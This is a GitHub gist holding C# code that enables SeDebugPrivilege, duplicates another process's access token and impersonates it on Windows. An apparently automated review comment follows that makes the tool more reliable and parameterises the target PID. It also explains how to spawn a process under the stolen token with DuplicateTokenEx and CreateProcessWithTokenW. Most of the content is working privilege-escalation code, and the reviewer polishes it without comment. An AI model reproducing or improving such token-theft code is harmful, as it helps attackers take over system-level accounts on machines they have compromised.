Last active
December 30, 2019 15:54
shelld0n renamed this gist
Dec 30, 2019 · 1 changed file with 0 additions and 0 deletions.
File renamed without changes. -
shelld0n created this gist
Dec 30, 2019
@@ -0,0 +1,50 @@ using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Runtime.InteropServices; namespace Token { class Program { static void Main(string[] args) { // Objectif is : https://0x00-0x00.github.io/research/2018/10/17/Windows-API-and-Impersonation-Part1.html // Enable SeDebugPrivilege ? string Privilege = "SeDebugPrivilege"; API.LUID luid = new API.LUID(); IntPtr hProcess = API.GetCurrentProcess(); IntPtr hToken; if (!API.OpenProcessToken(hProcess, API.TOKEN_QUERY | API.TOKEN_ADJUST_PRIVILEGES, out hToken)) { Console.WriteLine("No tokens for current process"); Environment.Exit(2); }; if (!API.LookupPrivilegeValue(null, Privilege, out luid)) { Console.WriteLine("No handle for privilege"); Environment.Exit(2); }; API.LUID_AND_ATTRIBUTES luAttr = new API.LUID_AND_ATTRIBUTES { Luid = luid, Attributes = API.LUID_AND_ATTRIBUTES.SE_PRIVILEGE_ENABLED }; API.TOKEN_PRIVILEGES tp = new API.TOKEN_PRIVILEGES { PrivilegeCount = 1, Privileges = new API.LUID_AND_ATTRIBUTES[1] }; tp.Privileges[0] = luAttr; API.TOKEN_PRIVILEGES oldState = new API.TOKEN_PRIVILEGES(); // Our old state. 
UInt32 trash; if (!API.AdjustTokenPrivileges(hToken, false, ref tp, (UInt32)Marshal.SizeOf(tp), ref oldState, out trash)) { Console.WriteLine("Can't Adjust access Token"); Environment.Exit(2); }; // Duplicate Tokens for system process and use them Console.WriteLine("your journey just started"); IntPtr test = API.OpenProcess(API.ProcessAccessFlags.QueryInformation, true, 1340); //IntPtr test = API.GetCurrentProcess(); if (test == IntPtr.Zero) Console.WriteLine("No Handle to process !"); IntPtr tokenHandle; bool result_token = API.OpenProcessToken(test, API.TOKEN_READ | API.TOKEN_IMPERSONATE | API.TOKEN_DUPLICATE, out tokenHandle); Console.WriteLine(result_token); IntPtr DuplicatedToken = new IntPtr(); bool result_duplicate = API.DuplicateToken(tokenHandle, 2, ref DuplicatedToken); Console.WriteLine(result_duplicate); bool result_settoken = API.SetThreadToken(IntPtr.Zero, DuplicatedToken); Console.WriteLine(result_settoken); Console.ReadKey(); //System.Diagnostics.Process.Start("CMD.exe", "whoami"); Console.WriteLine(Environment.UserName); Console.ReadKey(); } } }
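Review bot: A failure of any step after the privilege adjustment is printed but never acted on: when `OpenProcess(..., 1340)` returns `IntPtr.Zero` the code only prints "No Handle to process !" and continues into `OpenProcessToken` with a null handle, and `result_token`/`result_duplicate` are merely written to the console before `DuplicateToken` and `SetThreadToken` consume whatever happens to be in `tokenHandle`/`DuplicatedToken`, so one failure produces a cascade of misleading `False` lines instead of a clean exit. The earlier `AdjustTokenPrivileges` check is also incomplete, because that call returns true even when the privilege was not granted and only reports it via `ERROR_NOT_ALL_ASSIGNED` (1300) from `Marshal.GetLastWin32Error()`, which requires `SetLastError = true` on the P/Invoke declaration in the `API` class that lives outside this hunk. The target PID `1340` and the impersonation level `2` are magic numbers, `bInheritHandle` is `true` for no apparent reason, and none of `hToken`, `test`, `tokenHandle` or `DuplicatedToken` is ever closed (if `API` wraps `CloseHandle`, each should be released before exit). Note too that the commented-out `Process.Start("CMD.exe", "whoami")` would not run as the impersonated user, since `SetThreadToken` affects only the calling thread while `CreateProcess` uses the process token; launching a process under the duplicated token needs a primary token from `DuplicateTokenEx` plus `CreateProcessWithTokenW`/`CreateProcessAsUser`.
```csharp
// … unchanged: SeDebugPrivilege LUID lookup and TOKEN_PRIVILEGES setup …
UInt32 trash;
if (!API.AdjustTokenPrivileges(hToken, false, ref tp, (UInt32)Marshal.SizeOf(tp), ref oldState, out trash)
    || Marshal.GetLastWin32Error() == 1300) // ERROR_NOT_ALL_ASSIGNED: call "succeeds" but the privilege is not held
{
    Console.WriteLine("Can't Adjust access Token");
    Environment.Exit(2);
}

// Target PID comes from the command line; the old hard-coded 1340 is only a fallback.
int targetPid = args.Length > 0 ? int.Parse(args[0]) : 1340;
IntPtr test = API.OpenProcess(API.ProcessAccessFlags.QueryInformation, false, targetPid);
if (test == IntPtr.Zero)
{
    Console.WriteLine("No Handle to process !");
    Environment.Exit(2);
}

IntPtr tokenHandle;
if (!API.OpenProcessToken(test, API.TOKEN_READ | API.TOKEN_IMPERSONATE | API.TOKEN_DUPLICATE, out tokenHandle))
{
    Console.WriteLine("OpenProcessToken on target failed");
    Environment.Exit(2);
}

IntPtr DuplicatedToken = IntPtr.Zero;
const int SecurityImpersonation = 2; // SECURITY_IMPERSONATION_LEVEL
if (!API.DuplicateToken(tokenHandle, SecurityImpersonation, ref DuplicatedToken))
{
    Console.WriteLine("DuplicateToken failed");
    Environment.Exit(2);
}

if (!API.SetThreadToken(IntPtr.Zero, DuplicatedToken))
{
    Console.WriteLine("SetThreadToken failed");
    Environment.Exit(2);
}
// … unchanged: ReadKey / Environment.UserName output …
```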